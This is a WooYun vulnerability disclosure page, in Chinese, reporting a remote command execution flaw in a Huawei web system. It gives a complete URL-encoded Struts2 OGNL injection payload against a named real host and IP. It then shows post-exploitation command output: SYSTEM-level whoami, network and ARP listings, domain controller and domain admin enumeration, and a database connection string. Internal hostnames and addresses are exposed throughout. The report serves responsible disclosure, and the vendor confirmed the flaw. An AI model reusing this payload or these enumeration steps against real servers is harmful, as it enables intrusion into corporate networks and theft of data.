当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149850

漏洞标题:华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络)

相关厂商:华为技术有限公司

漏洞作者: 猪猪侠

提交时间:2015-10-27 15:42

修复时间:2015-12-12 00:34

公开时间:2015-12-12 00:34

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开

简要描述:

华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络 域环境)
在域环境内,SYSTEM权限,可内网渗透,影响大,考虑了半天,还是写中文的
利用域渗透技术
http://zone.wooyun.org/content/23396

详细说明:

#1 漏洞服务器
http://wdt-mx.huawei.com/sdtrp/project.action
http://119.145.15.78/sdtrp/project.action

漏洞证明:

#2 exp
http://wdt-mx.huawei.com

http://119.145.15.78/sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D


D:\WEB_Server\apache-tomcat-6.0.44\webapps\sdtrp\
whoami

nt authority\system


ipconfig /all
Windows IP Configuration
   Host Name . . . . . . . . . . . . : DGGWDTRP01-TGE
   Primary Dns Suffix  . . . . . . . : china.huawei.com


arp -a
Interface: 10.88.178.105 --- 0xc
  Internet Address      Physical Address      Type
  10.88.178.1           00-00-5e-00-01-b2     dynamic   
  10.88.178.2           f8-4a-bf-5c-1d-0e     dynamic   
  10.88.178.3           f8-4a-bf-5c-1b-fe     dynamic   
  10.88.178.255         ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static    
Interface: 10.88.72.91 --- 0xe
  Internet Address      Physical Address      Type
  10.88.72.1            00-00-5e-00-01-48     dynamic   
  10.88.72.2            f8-4a-bf-5c-1d-0d     dynamic   
  10.88.72.3            f8-4a-bf-5c-1b-fd     dynamic   
  10.88.72.5            00-25-9e-b0-db-44     dynamic   
  10.88.72.255          ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static


# 在域环境内,可内网渗透,影响非常大

net time /domain
Current time at \\LGGAD41-DC.china.huawei.com is 2015/10/27 16:52:34


Pinging LGGAD39-DC.china.huawei.com [10.72.135.58] with 32 bytes of data
Pinging uniportal.huawei.com [10.82.55.193] with 32 bytes of data:
Pinging mail.huawei.com [10.72.61.76] with 32 bytes of data:


域环境内:光域控制器都几百台,几十万人不是盖的
net group "Domain controllers" /domain

The request will be processed at a domain controller for domain china.huawei.com.
Group name     Domain Controllers
Comment        óò?D?ùóDóò?????÷
Members
-------------------------------------------------------------------------------


mask 区域


*****$              BLR*****
*****$              BRA*****
*****$              CGK*****
*****$              DFW*****
*****$              DGG*****
*****$              DGG*****
*****$              HGH*****
*****$              HKG*****
*****$              ISB*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LHR*****
*****$              LOS*****
*****$              MSC*****
*****$              NKG*****
*****$              NKG*****
*****$              NKG*****
*****$              NKG*****
*****$              PEK*****
*****$              RUH*****
*****$              SIA*****
*****$              SJC*****
*****$              SZX*****
*****$              SZX*****
*****$              SZX*****
*****D02-DC$        *****






           
YYZAD02-DC$              
The command completed successfully.


The request will be processed at a domain controller for domain china.huawei.com.
Group name     IT-ITPL-DC-CD-w
Comment        云数据中心安全解决方案部
Members
-------------------------------------------------------------------------------


mask 区域


*****               d00*****
*****               h00*****
*****               h00*****
*****               j00*****
*****               l00*****
*****               l00*****
*****               l00*****
*****               l00*****
*****               o00*****
*****               r90*****
*****               s00*****
*****               w00*****
*****               w00*****
*****               x00*****
*****               y00*****
*****               y90*****
*****               z00*****
*****               z00*****
*****0359515       *****






             
The command completed successfully.


# 终极BOSS

The request will be processed at a domain controller for domain china.huawei.com.
User name                    china-admin
Full Name                    
Comment                      管理计算机(域)的内置帐户
User's comment               
Country code                 000 (System Default)
Account active               Yes
Account expires              Never
Password last set            2015/10/17 16:04:55
Password expires             Never
Password changeable          2015/10/17 16:04:55
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never
Logon hours allowed          All
Local Group Memberships      *Administrators       *MomAdministrators    
                             *X86-ADMIN1           *X86-ADMIN2           
                             *X86-ADMIN3           
Global Group memberships     *MOMadmins            *Domain Admins        
                             *Domain Users         *Group Policy Creator 
The command completed successfully.


# 审计监控系统的数据库

var strADOConn="Provider=sqloledb;Data Source=szxmng02-nt.huawei.com;User ID=nt_task_monitor;Password=********;Network Library=dbmssocn";
var oADOConn,oADOCommand,oADORecord;
var strServer,strTask,strStatus,strADOCommand;
var oArgs;
var iAffected;


修复方案:

# 更新

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-28 00:32

厂商回复:

感谢猪猪侠提醒,已通知业务进行修复。

最新状态:

暂无